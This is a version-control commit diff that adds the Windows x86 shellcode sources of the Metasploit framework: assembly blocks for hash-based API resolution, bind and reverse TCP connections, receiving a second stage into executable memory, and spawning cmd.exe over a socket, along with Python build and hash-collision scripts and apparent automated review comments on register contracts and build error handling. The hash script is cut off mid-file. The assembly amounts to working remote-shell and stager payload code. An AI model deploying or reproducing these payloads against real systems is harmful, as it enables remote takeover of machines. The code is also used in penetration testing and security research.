Overhaul of the metasploit payloads from Stephen Fewer - smaller/cleaner/new hashing/support for WinNT 4.0 -> Win7 with size reductions for the stagers and minimal size increases for the singles
git-svn-id: file:///home/svn/framework3/trunk@6922 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
91faadd782
commit
49b7dcb30c
BIN
external/source/shellcode/windows/x86/bin/single_exec.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/single_exec.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stage_shell.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stage_shell.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stage_upexec.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stage_upexec.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin
vendored
Normal file
Binary file not shown.
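--- a/external/source/shellcode/windows/x86/build.py
+++ b/external/source/shellcode/windows/x86/build.py
@@ -0,0 +1,98 @@
+#=============================================================================#
+# A simple python build script to build the singles/stages/stagers and
+# some usefull information such as offsets and a hex dump. The binary output
+# will be placed in the bin directory. A hex string and usefull comments will
+# be printed to screen.
+#
+# Example:
+# >python build.py stager_reverse_tcp_nx
+#
+# Example, to build everything:
+# >python build.py all > build_output.txt
+#
+# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+#=============================================================================#
+import os, sys, time
+from subprocess import Popen
+from struct import pack
+#=============================================================================#
+def clean( dir="./bin/" ):
+    for root, dirs, files in os.walk( dir ):
+        for name in files:
+            os.remove( os.path.join( root, name ) )
+#=============================================================================#
+def locate( src_file, dir="./src/" ):
+    for root, dirs, files in os.walk( dir ):
+        for name in files:
+            if src_file == name:
+                return root
+    return None
+#=============================================================================#
+def build( name ):
+    location = locate( "%s.asm" % name )
+    if location:
+        input = os.path.normpath( os.path.join( location, name ) )
+        output = os.path.normpath( os.path.join( "./bin/", name ) )
+        p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
+        p.wait()
+        xmit( name )
+    else:
+        print "[-] Unable to locate '%s.asm' in the src directory" % name
+#=============================================================================#
+def xmit_dump_ruby( data, length=16 ):
+    dump = ""
+    for i in xrange( 0, len( data ), length ):
+        bytes = data[ i : i+length ]
+        hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
+        if i+length <= len(data):
+            hex += " +"
+        dump += "%s\n" % ( hex )
+    print dump
+#=============================================================================#
+def xmit_offset( data, name, value ):
+    offset = data.find( value );
+    if offset != -1:
+        print "# %s Offset: %d" % ( name, offset )
+#=============================================================================#
+def xmit( name, dump_ruby=True ):
+    bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
+    f = open( bin, 'rb')
+    data = f.read()
+    print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
+    xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
+    xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
+    xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
+    xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
+    xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
+    xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
+    if dump_ruby:
+        xmit_dump_ruby( data )
+#=============================================================================#
+def main( argv=None ):
+    if not argv:
+        argv = sys.argv
+    try:
+        if len( argv ) == 1:
+            print "Usage: build.py [clean|all|<name>]"
+        else:
+            print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
+            if argv[1] == "clean":
+                clean()
+            elif argv[1] == "all":
+                for root, dirs, files in os.walk( "./src/single/" ):
+                    for name in files:
+                        build( name[:-4] )
+                for root, dirs, files in os.walk( "./src/stage/" ):
+                    for name in files:
+                        build( name[:-4] )
+                for root, dirs, files in os.walk( "./src/stager/" ):
+                    for name in files:
+                        build( name[:-4] )
+            else:
+                build( argv[1] )
+    except Exception, e:
+        print "[-] ", e
+#=============================================================================#
+if __name__ == "__main__":
+    main()
+#=============================================================================#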
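Review bot: build() discards nasm's exit status — `p.wait()` returns the code but nothing inspects it, so a failed assembly falls straight into xmit(), which then dumps a stale .bin left from an earlier run or raises on a missing file and is reported only by main()'s catch-all. Checking it before xmit, `if p.wait() != 0:` followed by a `print "[-] nasm failed for %s" % name` and `return`, would make a broken build visible in the captured output. I would also confirm that nasm accepts `"-f bin"` and `"-o %s.bin"` as single argv entries, since list-form Popen does not split them; `"-f", "bin", "-o", "%s.bin" % output` is the unambiguous spelling. Separately, xmit() never closes the file it opens — `with open( bin, 'rb' ) as f: data = f.read()` fixes that — and the locals `input`, `bytes` and `hex` shadow builtins.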
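--- a/external/source/shellcode/windows/x86/src/block/block_api.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_api.asm
@@ -0,0 +1,97 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+
+; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+; Output: The return value from the API call will be in EAX.
+; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+; Note: This function is unable to call forwarded exports.
+
+api_call:
+pushad ; We preserve all the registers for the caller, bar EAX and ECX.
+mov ebp, esp ; Create a new stack frame
+xor edx, edx ; Zero EDX
+mov edx, [fs:edx+48] ; Get a pointer to the PEB
+mov edx, [edx+12] ; Get PEB->Ldr
+mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
+next_mod: ;
+mov esi, [edx+40] ; Get pointer to modules name (unicode string)
+movzx ecx, word [edx+38] ; Set ECX to the length we want to check
+xor edi, edi ; Clear EDI which will store the hash of the module name
+loop_modname: ;
+xor eax, eax ; Clear EAX
+lodsb ; Read in the next byte of the name
+cmp al, 'a' ; Some versions of Windows use lower case module names
+jl not_lowercase ;
+sub al, 0x20 ; If so normalise to uppercase
+not_lowercase: ;
+ror edi, 13 ; Rotate right our hash value
+add edi, eax ; Add the next byte of the name
+loop loop_modname ; Loop untill we have read enough
+; We now have the module hash computed
+push edx ; Save the current position in the module list for later
+push edi ; Save the current module hash for later
+; Proceed to itterate the export address table,
+mov edx, [edx+16] ; Get this modules base address
+mov eax, [edx+60] ; Get PE header
+add eax, edx ; Add the modules base address
+mov eax, [eax+120] ; Get export tables RVA
+test eax, eax ; Test if no export address table is present
+jz get_next_mod1 ; If no EAT present, process the next module
+add eax, edx ; Add the modules base address
+push eax ; Save the current modules EAT
+mov ecx, [eax+24] ; Get the number of function names
+mov ebx, [eax+32] ; Get the rva of the function names
+add ebx, edx ; Add the modules base address
+; Computing the module hash + function hash
+get_next_func: ;
+jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
+dec ecx ; Decrement the function name counter
+mov esi, [ebx+ecx*4] ; Get rva of next module name
+add esi, edx ; Add the modules base address
+xor edi, edi ; Clear EDI which will store the hash of the function name
+; And compare it to the one we want
+loop_funcname: ;
+xor eax, eax ; Clear EAX
+lodsb ; Read in the next byte of the ASCII function name
+ror edi, 13 ; Rotate right our hash value
+add edi, eax ; Add the next byte of the name
+cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
+jne loop_funcname ; If we have not reached the null terminator, continue
+add edi, [ebp-8] ; Add the current module hash to the function hash
+cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
+jnz get_next_func ; Go compute the next function hash if we have not found it
+; If found, fix up stack, call the function and then value else compute the next one...
+pop eax ; Restore the current modules EAT
+mov ebx, [eax+36] ; Get the ordinal table rva
+add ebx, edx ; Add the modules base address
+mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
+mov ebx, [eax+28] ; Get the function addresses table rva
+add ebx, edx ; Add the modules base address
+mov eax, [ebx+4*ecx] ; Get the desired functions RVA
+add eax, edx ; Add the modules base address to get the functions actual VA
+; We now fix up the stack and perform the call to the desired function...
+finish:
+mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
+pop ebx ; Clear off the current modules hash
+pop ebx ; Clear off the current position in the module list
+popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+pop ecx ; Pop off the origional return address our caller will have pushed
+pop edx ; Pop off the hash value our caller will have pushed
+push ecx ; Push back the correct return value
+jmp eax ; Jump into the required function
+; We now automagically return to the correct caller...
+get_next_mod: ;
+pop eax ; Pop off the current (now the previous) modules EAT
+get_next_mod1: ;
+pop edi ; Pop off the current (now the previous) modules hash
+pop edx ; Restore our position in the module list
+mov edx, [edx] ; Get the next module
+jmp short next_mod ; Process this module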
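Review bot: The register contract is stated inconsistently inside block_api.asm: the header says `; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)` and the popad comment agrees, but the comment on the opening `pushad` reads "bar EAX and ECX", omitting EDX, which the epilogue explicitly pops the hash into. I would change that line to `pushad ; We preserve all the registers for the caller, bar EAX, ECX and EDX.` so the two places match. It would also help the header to state that, after the hash is removed, the caller's pushed API arguments are left in place for the called function to clean up, since the closing "automagically return" comment is the only hint at how the return path works.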
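--- a/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm
@@ -0,0 +1,63 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
+push 0x5F327377 ; ...
+push esp ; Push a pointer to the "ws2_32" string on the stack.
+push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+call ebp ; LoadLibraryA( "ws2_32" )
+
+mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
+sub esp, eax ; alloc some space for the WSAData structure
+push esp ; push a pointer to this stuct
+push eax ; push the wVersionRequested parameter
+push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
+call ebp ; WSAStartup( 0x0190, &WSAData );
+
+push eax ; if we succeed, eax wil be zero, push zero for the flags param.
+push eax ; push null for reserved parameter
+push eax ; we do not specify a WSAPROTOCOL_INFO structure
+push eax ; we do not specify a protocol
+inc eax ;
+push eax ; push SOCK_STREAM
+inc eax ;
+push eax ; push AF_INET
+push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
+call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+mov edi, eax ; save the socket for later
+
+xor ebx, ebx ; Clear EBX
+push ebx ; bind to 0.0.0.0
+push 0x5C110002 ; family AF_INET and port 4444
+mov esi, esp ; save a pointer to sockaddr_in struct
+push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+push esi ; pointer to the sockaddr_in struct
+push edi ; socket
+push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
+call ebp ; bind( s, &sockaddr_in, 16 );
+
+push ebx ; backlog
+push edi ; socket
+push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
+call ebp ; listen( s, 0 );
+
+push ebx ; we set length for the sockaddr struct to zero
+push ebx ; we dont set the optional sockaddr param
+push edi ; listening socket
+push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
+call ebp ; accept( s, 0, 0 );
+
+push edi ; push the listening socket to close
+mov edi, eax ; swap the new connected socket over the listening socket
+push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
+call ebp ; closesocket( s );
+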
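Review bot: The header's `; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)` omits EBX, which `xor ebx, ebx` zeroes before the bind call and which is then reused for the listen and accept arguments, so a caller keeping state in EBX across this block would lose it. I would change the line to `; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)`. The 0x1A0 figure can be read off the block itself — 8 bytes for the pushed "ws2_32" string, 0x190 for WSAData and 8 for the sockaddr_in, with the API arguments presumably removed by the stdcall callees — and a one-line comment saying so would help, since the same number appears unexplained in block_reverse_tcp.asm.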
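--- a/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
@@ -0,0 +1,52 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 31 bytes
+;-----------------------------------------------------------------------------;
+; kernel32.dll!SetUnhandledExceptionFilter (0xEA320EFE) - This exit function
+; will let the UnhandledExceptionFilter function perform its default handling
+; routine.
+;
+; kernel32.dll!ExitProcess (0x56A2B5F0) - This exit function will force the
+; process to terminate.
+;
+; kernel32.dll!ExitThread (0x0A2A1DE0) - This exit function will force the
+; current thread to terminate. On Windows 2008, Vista and 7 this function is
+; a forwarded export to ntdll.dll!RtlExitUserThread and as such cannot be
+; called by the api_call function.
+;
+; ntdll.dll!RtlExitUserThread (0x6F721347) - This exit function will force
+; the current thread to terminate. This function is not available on Windows
+; NT or 2000.
+;-----------------------------------------------------------------------------;
+; Windows 7 6.1
+; Windows Server 2008 R2 6.1 If the EXITFUNK is ExitThread we must call
+; Windows Server 2008 6.0 RtlExitUserThread instead.
+; Windows Vista 6.0 _______________________________________________
+; Windows Server 2003 R2 5.2
+; Windows Server 2003 5.2
+; Windows XP 5.1
+; Windows 2000 5.0
+; Windows NT4 4.0
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: None.
+; Clobbers: EAX, EBX, (ESP will also be modified)
+; Note: Execution is not expected to (successfully) continue past this block
+
+exitfunk:
+mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
+push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
+call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
+cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
+jl short goodbye ; Then just call the exit function...
+cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+jne short goodbye ;
+mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+goodbye: ; We now perform the actual call to the exit function
+push byte 0 ; push the exit function parameter
+push ebx ; push the hash of the exit function
+call ebp ; call EXITFUNK( 0 );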
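Review bot: The ExitThread detection on `cmp bl, 0xE0` compares only the low byte of the EXITFUNK hash, so it silently depends on no other hash that build.py patches into this slot ending in 0xE0; the four listed there (0x0A2A1DE0, 0x56A2B5F0, 0xEA320EFE, 0xE035F044) and the RtlExitUserThread substitute 0x6F721347 do satisfy that today, but nothing records the constraint for whoever adds the next exit function. I would extend the comment to `cmp bl, 0xE0 ; Low byte of the ExitThread hash, assumes no other supported EXITFUNK hash ends in 0xE0`. The header's compatibility table above already documents the version split, so this is the only implicit assumption left in the block.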
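--- a/external/source/shellcode/windows/x86/src/block/block_recv.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_recv.asm
@@ -0,0 +1,44 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Compatible: block_bind_tcp, block_reverse_tcp
+
+; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
+; Output: None.
+; Clobbers: EAX, EBX, ESI, (ESP will also be modified)
+
+recv:
+; Receive the size of the incoming second stage...
+push byte 0 ; flags
+push byte 4 ; length = sizeof( DWORD );
+push esi ; the 4 byte buffer on the stack to hold the second stage length
+push edi ; the saved socket
+push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+call ebp ; recv( s, &dwLength, 4, 0 );
+; Alloc a RWX buffer for the second stage
+mov esi, [esi] ; dereference the pointer to the second stage length
+push byte 0x40 ; PAGE_EXECUTE_READWRITE
+push 0x1000 ; MEM_COMMIT
+push esi ; push the newly recieved second stage length.
+push byte 0 ; NULL as we dont care where the allocation is.
+push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+; Receive the second stage and execute it...
+mov ebx, eax ; ebx = our new memory address for the new stage
+push ebx ; push the address of the new stage so we can return into it
+read_more: ;
+push byte 0 ; flags
+push esi ; length
+push ebx ; the current address into our second stages RWX buffer
+push edi ; the saved socket
+push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+call ebp ; recv( s, buffer, length, 0 );
+add ebx, eax ; buffer += bytes_received
+sub esi, eax ; length -= bytes_received
+test esi, esi ; test length
+jnz read_more ; continue if we have more to read
+ret ; return into the second stage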
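Review bot: The header says `; Output: None.` but the block never returns to its caller: the final `ret` pops the buffer address pushed after VirtualAlloc and transfers control into the received stage, which then inherits whatever the block left in the registers. block_exitfunk.asm records its equivalent behaviour with a `; Note:` line; I would add `; Note: This block does not return, the final RET transfers control to the second stage. EDI (the socket) and EBP are left intact for it.` here, since block_shell.asm's header shows a stage expecting exactly those two inputs. The "ESI is a pointer on stack" input line could also say that it must point at four writable bytes, which the first recv comment implies but the contract does not.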
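--- a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
@@ -0,0 +1,45 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the socket for the connection to the server
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+reverse_tcp:
+push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
+push 0x5F327377 ; ...
+push esp ; Push a pointer to the "ws2_32" string on the stack.
+push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+call ebp ; LoadLibraryA( "ws2_32" )
+
+mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
+sub esp, eax ; alloc some space for the WSAData structure
+push esp ; push a pointer to this stuct
+push eax ; push the wVersionRequested parameter
+push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
+call ebp ; WSAStartup( 0x0190, &WSAData );
+
+push eax ; if we succeed, eax wil be zero, push zero for the flags param.
+push eax ; push null for reserved parameter
+push eax ; we do not specify a WSAPROTOCOL_INFO structure
+push eax ; we do not specify a protocol
+inc eax ;
+push eax ; push SOCK_STREAM
+inc eax ;
+push eax ; push AF_INET
+push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
+call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+mov edi, eax ; save the socket for later
+
+push 0x0100007F ; host 127.0.0.1
+push 0x5C110002 ; family AF_INET and port 4444
+mov esi, esp ; save pointer to sockaddr struct
+push byte 16 ; length of the sockaddr struct
+push esi ; pointer to the sockaddr struct
+push edi ; the socket
+push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
+call ebp ; connect( s, &sockaddr, 16 );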
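--- a/external/source/shellcode/windows/x86/src/block/block_shell.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_shell.asm
@@ -0,0 +1,49 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'. EDI must be a socket.
+; Output: None.
+; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
+
+shell:
+push 0x00646D63 ; push our command line: 'cmd',0
+mov ebx, esp ; save a pointer to the command line
+push edi ; our socket becomes the shells hStdError
+push edi ; our socket becomes the shells hStdOutput
+push edi ; our socket becomes the shells hStdInput
+xor esi, esi ; Clear ESI for all the NULL's we need to push
+push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
+pop ecx ; Set ECX for the loop
+push_loop: ;
+push esi ; push a null dword
+loop push_loop ; keep looping untill we have pushed enough nulls
+mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
+mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
+; perform the call to CreateProcessA
+push esp ; Push the pointer to the PROCESS_INFORMATION Structure
+push eax ; Push the pointer to the STARTUPINFO Structure
+push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+push esi ; We dont specify any dwCreationFlags
+inc esi ; Increment ESI to be one
+push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+dec esi ; Decrement ESI back down to zero
+push esi ; Set lpThreadAttributes to NULL
+push esi ; Set lpProcessAttributes to NULL
+push ebx ; Set the lpCommandLine to point to "cmd",0
+push esi ; Set lpApplicationName to NULL as we are using the command line param instead
+push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
+call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
+; perform the call to WaitForSingleObject
+mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
+dec esi ; Decrement ESI down to -1 (INFINITE)
+push esi ; push INFINITE inorder to wait forever
+inc esi ; Increment ESI back to zero
+push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
+push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
+call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );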
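Review bot: The header's `; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified` gives no figure, unlike the two socket blocks which quote (-0x1A0); from the code the block leaves the 4-byte "cmd" string, the three EDI pushes and the 18 null dwords on the stack, 88 bytes in all, so `(-0x58)` could be stated, assuming the CreateProcessA and WaitForSingleObject arguments are removed by the callees as block_api's header describes. A comment explaining why 18 dwords would also help: 16 bytes for the PROCESS_INFORMATION at ESP plus the first 56 bytes of the 68-byte STARTUPINFO, whose last three handle fields are the EDI values pushed earlier — the `lea eax, [esp + 16]`, `mov word [esp + 60], 0x0101` and `mov byte [eax], 68` lines only make sense with that layout in mind. The block also blocks in WaitForSingleObject until the child exits, which is worth a `; Note:` in the contract as block_exitfunk.asm does for its own non-returning behaviour.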
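--- a/external/source/shellcode/windows/x86/src/hash.py
+++ b/external/source/shellcode/windows/x86/src/hash.py
@@ -0,0 +1,146 @@
+#=============================================================================#
+# This script can detect hash collisions between exported API functions in
+# multiple modules by either scanning a directory tree or just a single module.
+# This script can also just output the correct hash value for any single API
+# function for use with the 'api_call' function in 'block_api.asm'.
+#
+# Example: Detect fatal collisions against all modules in the C drive:
+# >hash.py /dir c:\
+#
+# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
+# >hash.py /mod c:\windows\system32\ kernel32.dll
+#
+# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
+# >hash.py kernel32.dll WinExec
+#
+# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+#=============================================================================#
+from sys import path
+import os, time, sys
+
+# Modify this path to pefile to suit your machine...
+pefile_path = "D:\\Development\\Frameworks\\pefile\\"
+
+path.append( pefile_path )
+import pefile
+#=============================================================================#
+collisions = [ ( 0x006B8029, "ws2_32.dll!WSAStartup" ),
+               ( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ),
+               ( 0x6737DBC2, "ws2_32.dll!bind" ),
+               ( 0xFF38E9B7, "ws2_32.dll!listen" ),
+               ( 0xE13BEC74, "ws2_32.dll!accept" ),
+               ( 0x614D6E75, "ws2_32.dll!closesocket" ),
+               ( 0x6174A599, "ws2_32.dll!connect" ),
+               ( 0x5FC8D902, "ws2_32.dll!recv" ),
+               ( 0x5F38EBC2, "ws2_32.dll!send" ),
+
+               ( 0x5BAE572D, "kernel32.dll!WriteFile" ),
+               ( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ),
+               ( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ),
+               ( 0xE449F330, "kernel32.dll!GetTempPathA" ),
+               ( 0x528796C6, "kernel32.dll!CloseHandle" ),
+               ( 0x863FCC79, "kernel32.dll!CreateProcessA" ),
+               ( 0xE553A458, "kernel32.dll!VirtualAlloc" ),
+               ( 0x300F2F0B, "kernel32.dll!VirtualFree" ),
+               ( 0x0726774C, "kernel32.dll!LoadLibraryA" ),
+               ( 0x7802F749, "kernel32.dll!GetProcAddress" ),
+               ( 0x601D8708, "kernel32.dll!WaitForSingleObject" ),
+               ( 0x876F8B31, "kernel32.dll!WinExec" ),
+               ( 0x9DBD95A6, "kernel32.dll!GetVersion" ),
+               ( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ),
+               ( 0x56A2B5F0, "kernel32.dll!ExitProcess" ),
+               ( 0x0A2A1DE0, "kernel32.dll!ExitThread" ),
+
+               ( 0x6F721347, "ntdll.dll!RtlExitUserThread" ),
+
+               ( 0x23E38427, "advapi32.dll!RevertToSelf" )
+             ]
+
+collisions_detected = {}
+modules_scanned = 0
+functions_scanned = 0
+#=============================================================================#
+def ror( dword, bits ):
+    return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
+#=============================================================================#
+def unicode( string, uppercase=True ):
+    result = "";
+    if uppercase:
+        string = string.upper()
+    for c in string:
+        result += c + "\x00"
+    return result
+#=============================================================================#
+def hash( module, function, bits=13, print_hash=True ):
+    module_hash = 0
+    function_hash = 0
+    for c in unicode( module + "\x00" ):
+        module_hash = ror( module_hash, bits )
+        module_hash += ord( c )
+    for c in str( function + "\x00" ):
+        function_hash = ror( function_hash, bits )
+        function_hash += ord( c )
+    h = module_hash + function_hash & 0xFFFFFFFF
+    if print_hash:
+        print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
+    return h
+#=============================================================================#
+def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ):
+    global modules_scanned
+    global functions_scanned
+    try:
+        dll_name = dll_name.lower()
+        modules_scanned += 1
+        pe = pefile.PE( os.path.join( dll_path, dll_name ) )
+        for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
+            if export.name is None:
+                continue
+            h = hash( dll_name, export.name, print_hash=print_hashes )
+            for ( col_hash, col_name ) in collisions:
+                if col_hash == h and col_name != "%s!%s" % (dll_name, export.name):
+                    if h not in collisions_detected.keys():
+                        collisions_detected[h] = []
+                    collisions_detected[h].append( (dll_path, dll_name, export.name) )
+                    break
+            functions_scanned += 1
+    except:
+        pass
+#=============================================================================#
+def scan_directory( dir ):
+    for dot, dirs, files in os.walk( dir ):
+        for file_name in files:
+            if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe":
+                scan( dot, file_name )
+    print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) )
+    for h in collisions_detected.keys():
+        for (col_hash, col_name ) in collisions:
+            if h == col_hash:
+                detected_name = col_name
+                break
+        print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name )
+        for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
+            print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path )
+    print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned )
+#=============================================================================#
+def main( argv=None ):
+    if not argv:
+        argv = sys.argv
+    try:
+        if len( argv ) == 1:
+            print "Usage: hash.py [/dir <path>] | [/mod <path> <module.dll>] | [<module.dll> <function>]"
+        else:
+            print "[+] Ran on %s\n" % ( time.asctime( time.localtime() ) )
+            if argv[1] == "/dir":
+                print "[+] Scanning directory '%s' for collisions..." % argv[2]
+                scan_directory( argv[2] )
+            elif argv[1] == "/mod":
+                print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] )
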